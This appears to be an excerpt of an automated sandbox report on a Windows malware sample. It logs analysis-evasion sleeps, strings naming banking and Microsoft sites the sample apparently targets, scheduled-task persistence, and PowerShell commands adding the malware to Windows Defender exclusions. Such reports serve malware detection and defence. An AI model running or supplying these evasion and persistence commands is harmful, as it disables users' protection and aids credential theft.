Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -591799s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -591675s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -591564s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599858	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599737	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599590	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599474	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599238	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599111	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598974	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598833	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598709	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598571	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598449	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598315	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598190	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598049	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597896	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597747	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597626	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597505	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597381	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597243	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597142	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597011	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596895	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596757	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596510	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596410	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596278	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596152	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596041	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595925	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595793	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595693	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595446	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595321	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595207	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595045	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594904	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594730	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594624	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594522	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594411	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594280	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594164	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594064	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 593926	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 593794	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 593678	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 593547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599877
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599761
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599645
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599531
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599399
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599283
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599167
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599045
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 598929
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 598542
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 598424
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 598036
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597917
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597801
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597685
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597569
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597347
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597231
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597115
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596999
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596883
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596767
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596644
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596529
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596413
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596307
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596196
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596081
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 595938
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 595351
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 595033
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 594909
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 594787
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 594659
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 594534
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 594409
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 593378
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 593253
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 593128
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 592944
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 592708
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 592456
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 592170
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 592025
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 591914
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 591799
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 591675
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 591564

Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: HRrXXnBIpL.exe, 0000000E.00000002.1375540771.000000000091B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: HRrXXnBIpL.exe, 00000012.00000002.3728471829.0000000001537000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 7495 P.exe, 0000000D.00000002.3728239100.000000000154D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\7495 P.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\7495 P.exe

Code function: 13_2_06F89668 LdrInitializeThunk,

13_2_06F89668

Source: C:\Users\user\Desktop\7495 P.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\7495 P.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe"
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe"	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"	Jump to behavior

Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe"	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Process created: C:\Users\user\Desktop\7495 P.exe "C:\Users\user\Desktop\7495 P.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process created: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"	Jump to behavior

Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Users\user\Desktop\7495 P.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Design\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Design.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
